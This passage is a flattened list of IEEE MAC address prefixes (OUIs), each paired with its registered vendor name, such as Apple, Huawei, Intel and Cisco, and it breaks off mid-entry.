086F48 Shenzhen iComm Semiconductor CO.,LTD 14019C Ubyon Inc. 0434F6 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 546925 PS INODIC CO., LTD. E84727 Quectel Wireless Solutions Co.,Ltd. 28C538 Apple, Inc. 0499B9 Apple, Inc. 78028B Apple, Inc. A8C266 HUMAX Co., Ltd. F89522 HUAWEI TECHNOLOGIES CO.,LTD F8B132 HUAWEI TECHNOLOGIES CO.,LTD D4D7CF Realme Chongqing Mobile Telecommunications Corp.,Ltd. F4E4D7 FUJIAN STAR-NET COMMUNICATION CO.,LTD 7857B0 GERTEC BRASIL LTDA C4F122 Nexar Ltd. 6007C4 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F84D89 Apple, Inc. BCDB09 Cisco Meraki F84E17 Sony Corporation 9C2BA6 Ruijie Networks Co.,LTD 941457 Shenzhen Sundray Technologies Company Limited B898AD Motorola Mobility LLC, a Lenovo Company 64B94E Dell Technologies 5447E8 Syrotech Networks. Ltd. EC2BEB Amazon Technologies Inc. 0816D5 GOERTEK INC. 1C568E Zioncom Electronics (Shenzhen) Ltd. 28563A Fiberhome Telecommunication Technologies Co.,LTD 04C461 Murata Manufacturing Co., Ltd. A08222 Qingdao Haier Technology Co.,Ltd E01F2B Nokia Solutions and Networks GmbH & Co. KG AC8226 Qingdao Haier Technology Co.,Ltd C8CB9E Intel Corporate 540F57 Silicon Laboratories 4448FF Qingdao Haier Technology Co.,Ltd BC5729 Shenzhen KKM Co., Ltd 3C5576 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 90EB48 Shanghai XinMiaoLink Technology Co., Ltd 185345 Nokia E48210 HUAWEI TECHNOLOGIES CO.,LTD 7052D8 ITEL MOBILE LIMITED 94FF3C Fortinet, Inc. 001D5B Tecvan Informatica Ltda F8F7B9 HUAWEI TECHNOLOGIES CO.,LTD 0CCAFB TPVision Europe B.V 1CAE3E IEEE Registration Authority D0C35A Jabil Circuit de Chihuahua 84B630 Sichuan Tianyi Comheart Telecom Co.,LTD 58C7AC New H3C Technologies Co., Ltd 2067E0 Shenzhen iComm Semiconductor CO.,LTD 545284 Huawei Device Co., Ltd. 646140 Huawei Device Co., Ltd. C4170E Huawei Device Co., Ltd. 908175 Samsung Electronics Co.,Ltd 307467 Samsung Electronics Co.,Ltd F0CD31 Samsung Electronics Co.,Ltd 6401FB Landis+Gyr GmbH F8B54D Intel Corporate 182DF7 JY COMPANY EC2C11 CWD INNOVATION LIMITED F03575 Hui Zhou Gaoshengda Technology Co.,LTD E444E5 Extreme Networks, Inc. 7C8334 IEEE Registration Authority D86C5A HUMAX Co., Ltd. E4C0E2 Sagemcom Broadband SAS 4C3FA7 uGrid Network Inc. 207BD2 ASIX Electronics Corporation 687724 TP-LINK TECHNOLOGIES CO.,LTD. 249745 HUAWEI TECHNOLOGIES CO.,LTD 38A8CD IEEE Registration Authority 546706 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD C4E532 Arcadyan Corporation 0CAAEE Ansjer Electronics Co., Ltd. 906A94 hangzhou huacheng network technology co., ltd 100C29 Shenzhen NORCO lntelligent Technology Co.,Ltd F4239C SERNET (SUZHOU) TECHNOLOGIES CORPORATION 105A17 Tuya Smart Inc. C0F535 AMPAK Technology,Inc. 8C3DB1 Beijing H-IoT Technology Co., Ltd. D8A6F0 Wu Qi Technologies,Inc. 08E4DF Shenzhen Sande Dacom Electronics Co., Ltd 145808 Taicang T&W Electronics FCA64C Alibaba cloud computing Co., Ltd E069BA Cisco Systems, Inc 2436DA Cisco Systems, Inc 4CEBD6 Espressif Inc. B8374A Apple, Inc. EC7C2C HUAWEI TECHNOLOGIES CO.,LTD 008A76 Apple, Inc. 2037A5 Apple, Inc. DCB54F Apple, Inc. A0941A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 6C11B3 Wu Qi Technologies,Inc. F4B19C AltoBeam (China) Inc. A8D081 Huawei Device Co., Ltd. 740CEE Huawei Device Co., Ltd. 6CB4FD Huawei Device Co., Ltd. 0000C8 ALTOS COMPUTER SYSTEMS 7432C2 KYOLIS 00CE30 Express LUCK Industrial Ltd. C46E33 Zhong Ge Smart Technology Co., Ltd. 640E9B ISHIDA MEDICAL CO., LTD. 24F603 HUAWEI TECHNOLOGIES CO.,LTD 08FA28 HUAWEI TECHNOLOGIES CO.,LTD ECC1AB Guangzhou Shiyuan Electronic Technology Company Limited 1C9DC2 Espressif Inc. 1C2CE0 Shanghai Mountain View Silicon 2442BC Alinco,incorporated 18FC26 Qorvo International Pte. Ltd. 5C8382 Nokia 283613 IEEE Registration Authority F8CA85 NEC Corporation 38B800 Wistron Neweb Corporation CC312A HUIZHOU TCL COMMUNICATION ELECTRON CO.,LTD BCD7D4 Roku, Inc AC0BFB Espressif Inc. 945AFC Amazon Technologies Inc. 00D76D Intel Corporate B41CAB ICR, inc. 0C0E76 D-Link International 703E97 Iton Technology Corp. 2C1165 Silicon Laboratories 1C2A8B Nokia 300EB8 LG Electronics BC3329 Sony Interactive Entertainment Inc. A88940 Huawei Device Co., Ltd. 30B037 New H3C Technologies Co., Ltd 84F703 Espressif Inc. 20B868 Motorola Mobility LLC, a Lenovo Company 289C6E Shanghai High-Flying Electronics Technology Co., Ltd FC122C HUAWEI TECHNOLOGIES CO.,LTD 6CD1E5 HUAWEI TECHNOLOGIES CO.,LTD DCED83 Beijing Xiaomi Mobile Software Co., Ltd 104738 Nokia Shanghai Bell Co., Ltd. 3039A9 Hongshan Information Science and Technology (HangZhou) Co.,Ltd. FCD908 Xiaomi Communications Co Ltd 1C573E Altice Labs S.A. D0167C eero inc. 84144D Intel Corporate 44D5CC Amazon Technologies Inc. 485A67 Shaanxi Ruixun Electronic Information Technology Co., Ltd 945C9A Apple, Inc. 8C1F64 IEEE Registration Authority 9C6BF0 Shenzhen Yipingfang Network Technology Co., Ltd. 44953B RLTech India Private Limited 4C77CB Intel Corporate A85B36 IEEE Registration Authority 64C403 Quectel Wireless Solutions Co.,Ltd. EC9468 META SYSTEM SPA 1C4190 Universal Electronics, Inc. 64C394 HUAWEI TECHNOLOGIES CO.,LTD 00005B ELTEC ELEKTRONIK AG 00F39F Apple, Inc. F47B09 Intel Corporate E87829 IEEE Registration Authority 50325F Silicon Laboratories FC8A3D zte corporation 085A11 D-Link International 705FA3 Xiaomi Communications Co Ltd 3C62F0 Sercomm Corporation. 983B67 DWnet Technologies(Suzhou) Corporation 6C9392 BEKO Technologies GmbH 58355D Huawei Device Co., Ltd. AC7E01 Huawei Device Co., Ltd. 5CE42A Intel Corporate F0C814 SHENZHEN BILIAN ELECTRONIC CO.,LTD 1874E2 IEEE Registration Authority A0B086 Hirschmann Automation and Control GmbH 30B346 CJSC NORSI-TRANS 0004B8 Kumahira Co., Ltd. 000B3A PESA Inc. 9843FA Intel Corporate 20D276 ITEL MOBILE LIMITED D01769 Murata Manufacturing Co., Ltd. 3CBDD8 LG ELECTRONICS INC 54C250 Iskratel d.o.o. 00FAB6 Kontakt Micro-Location Sp z o.o. D09FD9 IEEE Registration Authority 04B9E3 Samsung Electronics Co.,Ltd 08A842 Huawei Device Co., Ltd. B825B5 Trakm8 Ltd 20415A Smarteh d.o.o. 405899 Logitech Far East 70B950 Texas Instruments 781C5A SHARP Corporation C45E5C HUAWEI TECHNOLOGIES CO.,LTD 94AA0A Fiberhome Telecommunication Technologies Co.,LTD E85C0A Cisco Systems, Inc 20C19B Intel Corporate 2C6DC1 Intel Corporate 7CF462 BEIJING HUAWOO TECHNOLOGIES CO.LTD 201F3B Google, Inc. C8059E Hefei Symboltek Co.,Ltd 34FCA1 Micronet union Technology(Chengdu)Co., Ltd. 107BCE Nokia 2897B8 myenergi Ltd B0A7B9 TP-Link Corporation Limited 6C5AB0 TP-Link Corporation Limited 60E6F0 Wistron Neweb Corporation C8F5D6 IEEE Registration Authority C4A151 Sichuan Tianyi Comheart Telecom Co.,LTD 7847E3 Sichuan Tianyi Comheart Telecom Co.,LTD 0000B8 SEIKOSHA CO., LTD. D035E5 EM Microelectronic A0D722 Samsung Electronics Co.,Ltd 5049B0 Samsung Electronics Co.,Ltd E805DC Verifone Inc. 000CDF JAI Manufacturing F092B4 Sichuan Tianyi Comheart Telecom Co.,LTD ECF8EB Sichuan Tianyi Comheart Telecom Co.,LTD 2C6373 Sichuan Tianyi Comheart Telecom Co.,LTD 9096F3 BUFFALO.INC F44E38 Olibra LLC 449BC1 HUAWEI TECHNOLOGIES CO.,LTD 2025D2 Fiberhome Telecommunication Technologies Co.,LTD 2C43BE Sunnovo International Limited 5810B7 Infinix mobility limited 18BFB3 Samsung Electronics Co., Ltd., Memory Division 082CED Technity Solutions Inc. 145AFC Liteon Technology Corporation EC153D Beijing Yaxunhongda Technology Co., Ltd. D8A35C Samsung Electronics Co.,Ltd C09296 zte corporation 4C7766 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 78E36D Espressif Inc. 000139 Point Multimedia Systems 30E396 Huawei Device Co., Ltd. D07D33 Huawei Device Co., Ltd. C0E1BE HUAWEI TECHNOLOGIES CO.,LTD 88E056 HUAWEI TECHNOLOGIES CO.,LTD 50E24E zte corporation 34865D Espressif Inc. 1CA0EF IEEE Registration Authority 540E58 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5C648E Zyxel Communications Corporation A49BCD Cisco Systems, Inc B4E3F9 Silicon Laboratories 2066CF FREEBOX SAS 2C8DB1 Intel Corporate 586C25 Intel Corporate 2CC81B Routerboard.com 042728 Microsoft Corporation B02491 Huawei Device Co., Ltd. 98751A Huawei Device Co., Ltd. B48901 HUAWEI TECHNOLOGIES CO.,LTD D8E72B NETSCOUT SYSTEMS INC 28F49B LEETEK 1842D4 Wuhan Hosan Telecommunication Technology Co.,Ltd A8637D D-Link International 6C1B3F MiraeSignal Co., Ltd B03DC2 Wasp artificial intelligence(Shenzhen) Co.,ltd C84D34 LIONS Taiwan Technology Inc. 446FF8 Dyson Limited 28AFFD Cisco Systems, Inc EC9365 Mapper.ai, Inc. 9C7613 Ring LLC D097FE Realme Chongqing Mobile Telecommunications Corp.,Ltd. 843A5B Inventec(Chongqing) Corporation F845C4 Shenzhen Netforward Micro-Electronic Co., Ltd. 2C17E0 SYSTEMES ET TECHNOLOGIES IDENTIFICATION (STid) 5449DF Peloton Interactive, Inc D8EB46 Google, Inc. 781053 China Mobile Group Device Co.,Ltd. 808AF7 Nanoleaf 182A57 HUAWEI TECHNOLOGIES CO.,LTD F83E95 HUAWEI TECHNOLOGIES CO.,LTD 481258 HUAWEI TECHNOLOGIES CO.,LTD CC3296 Huawei Device Co., Ltd. 1C9180 Apple, Inc. 4CB910 Apple, Inc. E0925C Apple, Inc. 00116C Nanwang Multimedia Inc.,Ltd 98CDAC Espressif Inc. 403F8C TP-LINK TECHNOLOGIES CO.,LTD. CCDB04 DataRemote Inc. 04D6F4 GD Midea Air-Conditioning Equipment Co.,Ltd. D4351D Technicolor Delivery Technologies Belgium NV 08474C Nokia 90C119 Nokia D8CD2C WUXI NEIHUA NETWORK TECHNOLOGY CO., LTD 7CF880 Cisco Systems, Inc 60A751 Huawei Device Co., Ltd. 102B41 Samsung Electronics Co.,Ltd 344AC3 HuNan ZiKun Information Technology CO., Ltd 8CAACE Xiaomi Communications Co Ltd E89F39 Nokia B0227A HP Inc. D85ED3 GIGA-BYTE TECHNOLOGY CO.,LTD. 249AD8 YEALINK(XIAMEN) NETWORK TECHNOLOGY CO.,LTD. 981A35 HUAWEI TECHNOLOGIES CO.,LTD 00E421 Sony Interactive Entertainment Inc. 682D83 SHENZHEN DINGHE COMMUNICATION COMPANY A84397 Innogrit Corporation 803428 Microchip Technology Inc. DC15C8 AVM Audiovisuelles Marketing und Computersysteme GmbH 6CD630 Rootous System Co.,Ltd 98AD1D Huawei Device Co., Ltd. F8AA3F DWnet Technologies(Suzhou) Corporation 0CCF89 SHENZHEN BILIAN ELECTRONIC CO.,LTD AC5AFC Intel Corporate C89402 CHONGQING FUGUI ELECTRONICS CO.,LTD. 7CB94C Bouffalo Lab (Nanjing) Co., Ltd. 0C8C69 Shenzhen elink smart Co., ltd D8BBC1 Micro-Star INTL CO., LTD. 58FC20 Altice Labs S.A. B844AE TCT mobile ltd E4F75B ARRIS Group, Inc. F8790A ARRIS Group, Inc. 1C937C ARRIS Group, Inc. F077C3 Intel Corporate 049081 Pensando Systems, Inc. 4C796E Intel Corporate F09E4A Intel Corporate 00682B Huawei Device Co., Ltd. 34318F Apple, Inc. C41411 Apple, Inc. CCC95D Apple, Inc. 7061BE Wistron Neweb Corporation D847BB Huawei Device Co., Ltd. C833E5 HUAWEI TECHNOLOGIES CO.,LTD 2CDD0C Discovergy GmbH BC9D42 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 240B88 Taicang T&W Electronics 0C938F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 348A12 Aruba, a Hewlett Packard Enterprise Company B068E6 CHONGQING FUGUI ELECTRONICS CO.,LTD. BCD7CE China Mobile (Hangzhou) Information Technology Co., Ltd. C43960 GD Midea Air-Conditioning Equipment Co.,Ltd. 44B6BE Cisco Systems, Inc 8CDEE6 Samsung Electronics Co.,Ltd 10EC81 Samsung Electronics Co.,Ltd C45D83 Samsung Electronics Co.,Ltd 9C9C1F Espressif Inc. 446FD8 IEEE Registration Authority 84D343 Calix Inc. 38B5D3 SecuWorks E86DE9 HUAWEI TECHNOLOGIES CO.,LTD 144658 HUAWEI TECHNOLOGIES CO.,LTD 58BE72 HUAWEI TECHNOLOGIES CO.,LTD 108FFE HUAWEI TECHNOLOGIES CO.,LTD D809D6 ZEXELON CO., LTD. 5CA4A4 Fiberhome Telecommunication Technologies Co.,LTD 5CBD9A Huawei Device Co., Ltd. 14A3B4 Huawei Device Co., Ltd. 9CA570 eero inc. A0412D Lansen Systems AB 4C7525 Espressif Inc. 7404F0 Mobiwire Mobiles (NingBo) Co., LTD B4B5B6 CHONGQING FUGUI ELECTRONICS CO.,LTD. 047A0B Beijing Xiaomi Electronics Co., Ltd. 900F0C CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 2C9AA4 Eolo SpA 18D5B6 SMG Holdings LLC 70F096 Cisco Systems, Inc BC9A53 Huawei Device Co., Ltd. DC2727 Huawei Device Co., Ltd. F042F5 Huawei Device Co., Ltd. E02E3F Huawei Device Co., Ltd. 8C8CAA LCFC(HeFei) Electronics Technology co., ltd 4C1154 Mobiwire Mobiles (NingBo) Co., LTD C4BF60 TECNO MOBILE LIMITED D040EF Murata Manufacturing Co., Ltd. D056BF AMOSENSE 001340 AD.EL s.r.l. A453EE IEEE Registration Authority C8A40D Cooler Master Technology Inc 38420B Sonos, Inc. 608D26 Arcadyan Corporation 1C3929 OHSUNG 8CF319 Siemens Industrial Automation Products Ltd., Chengdu EC75ED Citrix Systems, Inc. 002236 VECTOR SP. Z O.O. 2CF05D Micro-Star INTL CO., LTD. 8C476E IEEE Registration Authority 74D6CB New H3C Technologies Co., Ltd 0C3AFA New H3C Technologies Co., Ltd 80B97A eero inc. D476A0 Fortinet, Inc. 30A023 ROCK PATH S.R.L E848B8 TP-Link Corporation Limited 508E49 Xiaomi Communications Co Ltd AC3328 Huawei Device Co., Ltd. F8665A Apple, Inc. 60BEC4 Apple, Inc. F8B1DD Apple, Inc. A8817E Apple, Inc. 18B6CC We Corporation Inc. B00CD1 Hewlett Packard 48701E Texas Instruments 64037F Samsung Electronics Co.,Ltd B49D02 Samsung Electronics Co.,Ltd 809FF5 Samsung Electronics Co.,Ltd E0C377 Samsung Electronics Co.,Ltd 4CFBF4 Optimal Audio Ltd E02BE9 Intel Corporate DCB72E Xiaomi Communications Co Ltd B8876E Yandex Services AG F86D73 Zengge Co., Limited AC3728 Taicang T&W Electronics D8CC98 Huawei Device Co., Ltd. 20CD6E Realme Chongqing Mobile Telecommunications Corp.,Ltd. B40EDE Intel Corporate 78CB2C Join Digital, Inc. 0002F4 PCTEL, Inc. 309E1D OHSUNG 687912 IEEE Registration Authority 6CE874 HUAWEI TECHNOLOGIES CO.,LTD C469F0 HUAWEI TECHNOLOGIES CO.,LTD BC9930 HUAWEI TECHNOLOGIES CO.,LTD E868E7 Espressif Inc. D0BCC1 WEIFANG GOERTEK ELECTRONICS CO.,LTD 588694 EFM Networks C09435 ARRIS Group, Inc. BC69CB Panasonic Electric Works Networks Co., Ltd. 089356 HUAWEI TECHNOLOGIES CO.,LTD 6C146E HUAWEI TECHNOLOGIES CO.,LTD 44E968 HUAWEI TECHNOLOGIES CO.,LTD 647924 Huawei Device Co., Ltd. 3CE038 Omnifi Inc. 44CE3A Jiangsu Huacun Electronic Technology Co., Ltd. 9C1EA4 Renesas Electronics (Penang) Sdn. Bhd. 4CEF56 Shenzhen Sundray Technologies Company Limited E84F4B Shenzhen Delos Electronic Co., Ltd B04A39 Beijing Roborock Technology Co., Ltd. A4F9E4 AirVine Scientific, Inc. F44FD3 shenzhen hemuwei technology co.,ltd AC122F Fantasia Trading LLC FC45C3 Texas Instruments AC6AA3 Shenzhen Kertong Technology Co.,Ltd C8B6D3 HUAWEI TECHNOLOGIES CO.,LTD E04BA6 HUAWEI TECHNOLOGIES CO.,LTD 78C95E Midmark RTLS C033DA Shenzhen JRUN Technologies CO., LTD DC4A9E IEEE Registration Authority FC8D3D Leapfive Tech. Ltd. 4014AD Huawei Device Co., Ltd. A87484 zte corporation E4C32A TP-LINK TECHNOLOGIES CO.,LTD. 909A4A TP-LINK TECHNOLOGIES CO.,LTD. BC9789 Huawei Device Co., Ltd. 684571 Huawei Device Co., Ltd. 8493A0 Huawei Device Co., Ltd. 9C8E9C Huawei Device Co., Ltd. DCB7FC Alps Electric (Ireland) Ltd ACFAA5 digitron 141B30 Shenzhen Yipingfang Network Technology Co., Ltd. B8477A Dasan Electron Co., Ltd. 6CADAD CHONGQING FUGUI ELECTRONICS CO.,LTD. 800384 Ruckus Wireless D8373B Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd A8301C Qingdao Intelligent&Precise Electronics Co.,Ltd. 7C78B2 Wyze Labs Inc 0060E9 ATOP TECHNOLOGIES, INC. 642315 Huawei Device Co., Ltd. A4C74B Huawei Device Co., Ltd. B4ADA3 Guangzhou Shiyuan Electronic Technology Company Limited B8AE1C Smart Cube., Ltd 607072 SHENZHEN HONGDE SMART LINK TECHNOLOGY CO., LTD 001FB8 Universal Remote Control, Inc. D8F3BC Liteon Technology Corporation F46FED Fiberhome Telecommunication Technologies Co.,LTD 94B97E Espressif Inc. D4482D Shenzhen Deejoy Lighting Technology Co.,Ltd. 78E3DE Apple, Inc. D0D23C Apple, Inc. 64D2C4 Apple, Inc. DC5285 Apple, Inc. E88152 Apple, Inc. 908158 Apple, Inc. D8F8AF DAONTEC CCE0DA Baidu Online Network Technology (Beijing) Co., Ltd 408C4C Shenzhen MiaoMing Intelligent Technology Co.,Ltd FC698C ANDREAS STIHL AG & Co. KG 6C2D24 Zhen Shi Information Technology (Shanghai) Co., Ltd. E4842B HANGZHOU SOFTEL OPTIC CO., LTD 94026B Optictimes Co.,Ltd 084296 Mobile Technology Solutions LLC 34EFB6 Edgecore Networks Corporation E874C7 Sentinhealth 009023 ZILOG INC. 18FDCB IEEE Registration Authority 4487DB Tymphany Acoustic Technology (Huizhou) Co., Ltd. 5484DC zte corporation 38549B zte corporation 689320 New H3C Technologies Co., Ltd 9454CE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 388ABE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 001C7B Castlenet Technology Inc. 8C8D28 Intel Corporate 343EA4 Ring LLC 085BD6 Intel Corporate C81739 ITEL MOBILE LIMITED 58D061 HUAWEI TECHNOLOGIES CO.,LTD 90CCDF Intel Corporate B8D309 Cox Communications, Inc B0FEE5 Huawei Device Co., Ltd. 04C1D8 Huawei Device Co., Ltd. C8BC9C Huawei Device Co., Ltd. 083AF2 Espressif Inc. 743A20 New H3C Technologies Co., Ltd D8778B Intelbras 30C9AB CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 007E56 China Dragon Technology Limited 047E23 China Mobile IOT Company Limited 14CCB3 AO "GK NATEKS" 6CBAB8 Sagemcom Broadband SAS E0D464 Intel Corporate C0F6C2 HUAWEI TECHNOLOGIES CO.,LTD 60077C Jala Group D4AFF7 Arista Networks DCCD2F Seiko Epson Corporation 609866 Texas Instruments 3C1A9E VitalThings AS C884A1 Cisco Systems, Inc 18ECE7 BUFFALO.INC C4D738 Huawei Device Co., Ltd. F86465 Anova Applied Electronics, Inc. 90A935 JWEntertainment 10341B Spacelink 1CD6BE Wistron Neweb Corporation 28D127 Beijing Xiaomi Mobile Software Co., Ltd 30A452 Arrival Elements BV 8CC5B4 Sagemcom Broadband SAS F81B04 Zhong Shan City Richsound Electronic Industrial Ltd C868DE Huawei Device Co., Ltd. D00DF7 Huawei Device Co., Ltd. 4805E2 Huawei Device Co., Ltd. D88C79 Google, Inc. 60D4E9 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 30C50F HUAWEI TECHNOLOGIES CO.,LTD 2868D2 HUAWEI TECHNOLOGIES CO.,LTD 001E68 Quanta Computer Inc. 2C600C Quanta Computer Inc. 00238B Quanta Computer Inc. 0008F6 Sumitomo Electric Industries, Ltd 000BA2 Sumitomo Electric Industries, Ltd 00005F Sumitomo Electric Industries, Ltd F469D5 IEEE Registration Authority CCDB93 Cisco Systems, Inc 90769F SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 80EA07 TP-LINK TECHNOLOGIES CO.,LTD. 5448E6 Beijing Xiaomi Mobile Software Co., Ltd BC03A7 MFP MICHELIN 8012DF Shenzhen SuperElectron Technology Co.,Ltd. 441C7F Motorola Mobility LLC, a Lenovo Company 00B8B6 Motorola Mobility LLC, a Lenovo Company C8E265 Intel Corporate 18D61C Shenzhen TINNO Mobile Technology Corp. 04A2F3 Fiberhome Telecommunication Technologies Co.,LTD 982FF8 Huawei Device Co., Ltd. 40DCA5 Huawei Device Co., Ltd. 00D0B6 CRESCENT NETWORKS, INC. 2C6F51 Herospeed Digital Technology Limited 10E77A STMicrolectronics International NV 1CE61D Samsung Electronics Co.,Ltd EC2651 Apple, Inc. 183EEF Apple, Inc. 607EC9 Apple, Inc. 108B6A Antailiye Technology Co.,Ltd C01C30 Shenzhen WIFI-3L Technology Co.,Ltd D8C678 MitraStar Technology Corp. ECC01B HUAWEI TECHNOLOGIES CO.,LTD 9844CE HUAWEI TECHNOLOGIES CO.,LTD F09BB8 HUAWEI TECHNOLOGIES CO.,LTD BC17B8 Intel Corporate E8A1F8 zte corporation 304240 zte corporation 98A942 Guangzhou Tozed Kangwei Intelligent Technology Co., LTD 7018A7 Cisco Systems, Inc 24F150 Guangzhou Qi'an Technology Co., Ltd. 40882F Extreme Networks, Inc. 14C88B Apple, Inc. 2CA042 Huawei Device Co., Ltd. C083C9 Huawei Device Co., Ltd. 104F58 Aruba, a Hewlett Packard Enterprise Company 982CBC Intel Corporate 2050E7 AMPAK Technology,Inc. CCD083 Aruba, a Hewlett Packard Enterprise Company 44BB3B Google, Inc. 14C14E Google, Inc. D8C0A6 AzureWave Technology Inc. 08FA79 vivo Mobile Communication Co., Ltd. 8C5EBD Huawei Device Co., Ltd. 4CC53E Zyxel Communications Corporation E43D1A Broadcom Limited 802DBF Cisco Systems, Inc FC609B New H3C Technologies Co., Ltd DC503A Nanjing Ticom Tech Co., Ltd. 18473D CHONGQING FUGUI ELECTRONICS CO.,LTD. 942533 HUAWEI TECHNOLOGIES CO.,LTD 44F4E7 Cohesity Inc 244BFE ASUSTek COMPUTER INC. 7CDDE9 ATOM tech Inc. 08ACC4 FMTech 28B371 Ruckus Wireless 4C2113 Nokia Shanghai Bell Co., Ltd. 708CBB MIMODISPLAYKOREA B848AA EM Microelectronic 605661 IXECLOUD Tech 706979 IEEE Registration Authority D477B2 Netix Global B.V. F86BD9 Cisco Systems, Inc C014FE Cisco Systems, Inc 7CAD4F Cisco Systems, Inc F82F65 Huawei Device Co., Ltd. 0831A4 Huawei Device Co., Ltd. A8E978 Huawei Device Co., Ltd. D4F829 Sagemcom Broadband SAS E06234 Texas Instruments F8AC65 Intel Corporate 0019F4 Convergens Oy Ltd 448DBF Rhino Mobility LLC C0A66D Inspur Group Co., Ltd. 948AC6 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 909838 Huawei Device Co., Ltd. 002060 ALCATEL ITALIA S.p.A. E0F6B5 Nintendo Co.,Ltd 40B31E Universal Electronics, Inc. 884033 HUAWEI TECHNOLOGIES CO.,LTD FC956A OCTAGON SYSTEMS CORP. 0C14D2 China Mobile Group Device Co.,Ltd. 50382F ASE Group Chung-Li 2C9FFB Wistron Neweb Corporation 84CCA8 Espressif Inc. E0D462 Huawei Device Co., Ltd. 987ECA Inventus Power Eletronica do Brasil LTDA 6C2F8A Samsung Electronics Co.,Ltd F0B022 TOHO Electronics INC. 38F601 Solid State Storage Technology Corporation 1070FD Mellanox Technologies, Inc. 68B9D3 Shenzhen Trolink Technology CO, LTD 9056FC TECNO MOBILE LIMITED 24C8D3 McWane India Pvt Ltd AC7A56 Cisco Systems, Inc D89136 Dover Fueling Solutions 84D6C5 SolarEdge Technologies 5471DD Huawei Device Co., Ltd. 00062A Cisco Systems, Inc 98ED5C Tesla,Inc. C44268 CRESTRON ELECTRONICS, INC. B8E3EE Universal Electronics, Inc. C88314 Tempo Communications E8986D Palo Alto Networks 7C89C1 Palo Alto Networks 4018B1 Extreme Networks, Inc. 206C8A Extreme Networks, Inc. 885BDD Extreme Networks, Inc. 348584 Extreme Networks, Inc. B86392 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 40F520 Espressif Inc. 78AA82 New H3C Technologies Co., Ltd 08C0EB Mellanox Technologies, Inc. E4E112 Texas Instruments 3414B5 Texas Instruments D003EB Texas Instruments 6409AC TCT mobile ltd 24B657 Cisco Systems, Inc 3822E2 HP Inc. 08BFA0 Samsung Electronics Co.,Ltd 701F3C Samsung Electronics Co.,Ltd D48A39 Samsung Electronics Co.,Ltd E4F3C4 Samsung Electronics Co.,Ltd 9C2F4E zte corporation D8A8C8 zte corporation B8C6AA Earda Technologies co Ltd 54AED0 DASAN Networks, Inc. 6CF712 Nokia Solutions and Networks GmbH & Co. KG 189E2C Huawei Device Co., Ltd. 94DB56 Sony Home Entertainment&Sound Products Inc 5C5578 iryx corp F01090 New H3C Technologies Co., Ltd 487AF6 NCS ELECTRICAL SDN BHD 486E70 Zhejiang Tmall Technology Co., Ltd. 601D9D Sichuan AI-Link Technology Co., Ltd. D85F77 Telink Semiconductor (Shanghai) Co., Ltd. 2C97ED Sony Imaging Products & Solutions Inc. 188A6A AVPro Global Hldgs E42686 DWnet Technologies(Suzhou) Corporation 0C3796 BIZLINK TECHNOLOGY, INC. 38EB47 HUAWEI TECHNOLOGIES CO.,LTD 10C3AB HUAWEI TECHNOLOGIES CO.,LTD 2811EC HUAWEI TECHNOLOGIES CO.,LTD 3C7D0A Apple, Inc. 20826A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 646266 IEEE Registration Authority 645E2C IRay Technology Co., Ltd. B89047 Apple, Inc. 909C4A Apple, Inc. 908C43 Apple, Inc. 18D98F Huawei Device Co., Ltd. 147740 Huawei Device Co., Ltd. B4157E Celona Inc. 9043E2 Cornami, Inc 9C28F7 Xiaomi Communications Co Ltd 10521C Espressif Inc. 803049 Liteon Technology Corporation A02D13 AirTies Wireless Networks 3C5731 Cisco Systems, Inc C0D682 Arista Networks D80BCB Telink Semiconductor (Shanghai) Co., Ltd. 6C42AB Subscriber Networks, Inc. 64F6F7 Anhui Dynamic Power Co., Ltd. 941C56 Actiontec Electronics, Inc 00692D Sunnovo International Limited F4032A Amazon Technologies Inc. 501408 AiNET 943BB0 New H3C Technologies Co., Ltd 289AF7 ADVA Optical Networking Ltd. E84943 YUGE Information technology Co. Ltd 9CFCE8 Intel Corporate 8468C8 TOTOLINK TECHNOLOGY INT‘L LIMITED F0F0A4 Amazon Technologies Inc. CC2D1B SFR 80E540 ARRIS Group, Inc. B0B194 zte corporation 807B3E Samsung Electronics Co.,Ltd F8F1E6 Samsung Electronics Co.,Ltd 5CE176 Cisco Systems, Inc 28CDC4 CHONGQING FUGUI ELECTRONICS CO.,LTD. E8D8D1 HP Inc. 48EB62 Murata Manufacturing Co., Ltd. 50DE19 IEEE Registration Authority D005E4 Huawei Device Co., Ltd. 30AAE4 Huawei Device Co., Ltd. 342FBD Nintendo Co.,Ltd 9055DE Fiberhome Telecommunication Technologies Co.,LTD E8910F Fiberhome Telecommunication Technologies Co.,LTD 14AB56 WUXI FUNIDE DIGITAL CO.,LTD AC9085 Apple, Inc. 2C91AB AVM Audiovisuelles Marketing und Computersysteme GmbH 88A9B7 Apple, Inc. ECCED7 Apple, Inc. 4CE175 Cisco Systems, Inc 50E549 GIGA-BYTE TECHNOLOGY CO.,LTD. 6490C1 Beijing Xiaomi Mobile Software Co., Ltd CC5CDE China Mobile Group Device Co.,Ltd. 4C4FEE OnePlus Technology (Shenzhen) Co., Ltd A82BCD HUAWEI TECHNOLOGIES CO.,LTD 48DC2D HUAWEI TECHNOLOGIES CO.,LTD 0C42A1 Mellanox Technologies, Inc. E0859A SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. ECA940 ARRIS Group, Inc. FC8596 Axonne Inc. 60CE86 Sercomm Corporation. 0009FC IPFLEX Inc. A824B8 Nokia 809F9B Sichuan AI-Link Technology Co., Ltd. 6010A2 Crompton Instruments 34F150 Hui 